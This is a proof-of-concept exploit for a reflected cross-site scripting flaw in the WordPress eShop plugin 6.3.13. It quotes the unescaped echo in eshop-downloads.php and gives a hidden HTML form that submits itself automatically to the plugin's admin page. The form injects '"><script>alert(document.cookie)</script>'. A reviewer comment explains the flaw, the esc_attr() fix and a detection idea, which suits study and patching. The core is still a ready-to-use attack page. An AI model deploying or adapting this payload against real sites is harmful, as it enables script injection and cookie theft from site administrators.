<!--
# Exploit Title : WordPress eShop Plugin Reflected XSS
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : https://wordpress.org/plugins/eshop/
# Software Link : https://downloads.wordpress.org/plugin/eshop.6.3.13.zip
# Date: 2015-09-04
# Version : 6.3.13
# Tested On : Elementary Os - Firefox
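# Vulnerable Code:
# File: eshop-downloads.php , Lines: 138 and 468
# Line 138 (the value is taken directly from the POST request):
# $atitle=$_POST['title'];
# Line 468 (the same value is echoed into the value attribute without output escaping, so a double quote in it ends the attribute):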
<input type="text" name="title" id="filetitle" size="35" value="<?php echo $atitle; ?>" />
# Exploit :
-->
<!--
Reviewer note (defensive reading of the proof of concept below):
 * The form posts to the eshop-downloads admin page of a local test install
   (127.0.0.1) and submits itself 1 ms after the page loads, so no click is needed.
 * The "title" field starts with a double quote and a closing angle bracket, which
   end the value attribute shown at line 468 of eshop-downloads.php, and then carries
   a script element. The alert() only demonstrates that script runs in the page that
   echoes the field.
 * The mixed capitalisation of attribute names and type values does not change how
   a browser parses the form.
 * The form contains no nonce field. If the plugin accepts it as is, the handler
   presumably lacks a nonce check (check_admin_referer / wp_verify_nonce). Confirm
   this against the plugin source.
 * Fix at the sink: wrap the echoed value in esc_attr(). Sanitising the input when
   it is read (wp_unslash plus sanitize_text_field) is useful as a second layer, but
   it does not replace output escaping.
 * Detection: POST requests to this admin page whose title parameter contains quote
   or angle bracket characters are worth logging and reviewing.
-->
<form action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=eshop-downloads.php" Method="post" nAme="form1" enctype="multipart/form-data">
<input name="upfile" type="HidDen" value="M" />
<input type="hIdden" name="max_file_size" value="67108864" />
<input type="HIDDEN" Name="title" value='"><script>alert(document.cookie)</script><"'/>
<input name="overwrite" value="yes" type="hidden" />
<input type="hidden" name="up" value="upload File" class="button-primary" />
</form>
<!-- Auto-submit: setTimeout is given a string, which the browser evaluates as code; it calls form1.submit() after 1 ms. -->
<script language="javascript">
setTimeout('form1.submit()', 1);
</script>
<!--
# Discovered By : Ehsan Hosseini
-->